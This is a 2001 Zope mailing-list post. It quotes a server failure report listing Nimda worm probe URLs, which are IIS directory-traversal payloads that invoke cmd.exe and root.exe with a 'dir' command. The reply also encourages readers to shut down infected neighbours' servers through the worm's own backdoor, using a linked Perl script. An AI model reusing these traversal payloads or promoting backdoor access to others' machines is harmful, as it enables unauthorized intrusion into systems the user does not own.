[Zope] Zope 1 : NIMDA 0

Reinoud van Leeuwen reinoud@xs4all.nl
Thu, 20 Sep 2001 20:30:33 GMT


On 20 Sep 2001 18:28:43 -0000, you wrote:

>Failure Report (9/19/2001 - 24 hour report)
>Listing the top 30 files by the number of failed requests, sorted by the=
 number of failed requests.=20
>
>reqs: file
>----: ----
>1210: /scripts/..%255c../winnt/system32/cmd.exe
>1210:   /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>1204: /scripts/..%5c../winnt/system32/cmd.exe
>1204:   /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> 615: /scripts/root.exe
> 615:   /scripts/root.exe?/c+dir
> 611: /MSADC/root.exe
> 611:   /MSADC/root.exe?/c+dir
> 610: /c/winnt/system32/cmd.exe
> 610:   /c/winnt/system32/cmd.exe?/c+dir
> 609: /d/winnt/system32/cmd.exe
> 609:   /d/winnt/system32/cmd.exe?/c+dir
> 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> 608:   =
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> 606:   =
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> 604: /scripts/..%c1%1c../winnt/system32/cmd.exe
> 604:   /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> 604: =
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
/system32/cmd.exe
> 604:   =
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt=
/system32/cmd.exe?/c+dir
> 603: /scripts/..%c0%af../winnt/system32/cmd.exe
> 603:   /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> 603: /scripts/winnt/system32/cmd.exe
> 603:   /scripts/winnt/system32/cmd.exe?/c+dir
> 602: /scripts/..%c1%9c../winnt/system32/cmd.exe
> 602:   /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> 598: /scripts/..%252f../winnt/system32/cmd.exe
> 598:   /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>
>That is a lot of requests! Glad Zope could handle it.
>

You can "help" your infected neigbours by remotely turning their
infected servers off! see
http://pc.xs4all.nl/default.ida

(it is a Perl script that uses the same backdoor as the virus itself.
I've not yet installed perl in Zope, but am working on it ";-)

--=20
__________________________________________________
"Nothing is as subjective as reality"
Reinoud van Leeuwen       reinoud@xs4all.nl
http://www.xs4all.nl/~reinoud
-> when replying to a mailinglist mail, please do  <-
-> *NOT* cc: me as well. If I read the list I will <-
-> receive the reply as well!                      <-
__________________________________________________